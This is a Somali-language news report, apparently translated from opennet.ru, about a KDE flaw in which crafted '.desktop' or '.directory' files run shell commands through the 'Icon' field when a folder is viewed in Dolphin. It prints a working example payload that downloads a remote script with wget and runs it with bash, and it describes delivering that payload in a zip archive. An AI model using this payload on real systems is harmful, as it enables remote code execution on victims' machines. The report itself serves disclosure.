Gudaha KDE , kaas oo u ogolaanaya weeraryahanku inuu fuliyo amarada aan sabab lahayn marka isticmaaluhu uu arko buug ama kayd ay ku jiraan ".desktop" iyo ".directory" faylasha si gaar ah loo habeeyay. Weerarku wuxuu u baahan yahay in isticmaaluhu si fudud u eego liiska faylalka ku jira maareeyaha faylka Dolphin, soo dejiyo faylka desktop-ka xaasidka ah, ama u jiid gaaban miiska ama dukumentiga. Dhibaatadu waxay muujinaysaa in hadda la sii daayo maktabadaha iyo noocyadii hore, ilaa KDE 4. Nuglaanta ayaa weli ah (CVE lama meelayn).
Dhibaatada waxaa sababa hirgelinta khaladka ah ee fasalka KDesktopFile, kaas oo, marka la farsameynayo doorsoomiyaha "Icon", iyada oo aan si habboon loo baxsan, u gudbisa qiimaha KConfigPrivate :: expandString (), kaas oo fuliya ballaarinta jilayaasha gaarka ah, oo ay ku jiraan habaynta xargaha "$(..)" sida amarrada la fulinayo. Ka soo horjeeda shuruudaha qeexitaanka XDG, hirgelinta dhismooyinka qolofka ayaa la soo saaraa iyada oo aan la kala saarin nooca goobaha, i.e. ma aha oo kaliya marka la go'aaminayo khadka taliska ee codsiga la bilaabayo, laakiin sidoo kale marka la tilmaamayo calaamadaha lagu soo bandhigay default.
Tusaale ahaan, in la weeraro u dir isticmaalaha zip archive oo wata hage ka kooban faylka ".directory" sida:
[Entry Desktop] Nooca=Hagaha
Icon[$e]=$(wget${IFS}https://example.com/FILENAME.sh&&/bin/bash${IFS}FILENAME.sh)
Markaad isku daydo inaad aragto waxa ku jira kaydka maamulaha faylka Dolphin, qoraalka https://example.com/FILENAME.sh waa la soo dejin doonaa oo la fulin doonaa.
Source: opennet.ru